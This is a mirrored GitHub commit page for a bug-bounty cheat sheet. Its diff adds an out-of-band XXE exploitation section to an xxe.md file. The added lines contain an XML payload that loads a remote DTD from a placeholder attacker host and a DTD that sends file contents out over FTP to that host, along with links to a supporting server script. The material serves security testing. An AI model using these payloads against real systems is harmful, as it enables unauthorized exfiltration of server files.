Mirrors/bugbounty-cheatsheet
2
0
Fork 0
mirror of https://github.com/EdOverflow/bugbounty-cheatsheet.git synced 2024-11-21 18:53:01 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #21 from streaak/master2

Browse source 
Master2
This commit is contained in:
EdOverflow 2017-10-05 20:13:21 +02:00 committed by GitHub
commit b54c313e3f
1 changed files with 18 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

18
cheatsheets/xxe.md
View file

@ -57,3 +57,21 @@
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<lolz><lol>3..2..1...&test<lol></lolz>
```
**XXE FTP HTTP Server**
https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
```
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendftp.dtd">
%remote;
%send;
]>
<data>4</data>
File stored on http://publicServer.com/parameterEntity_sendftp.dtd
<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1;
```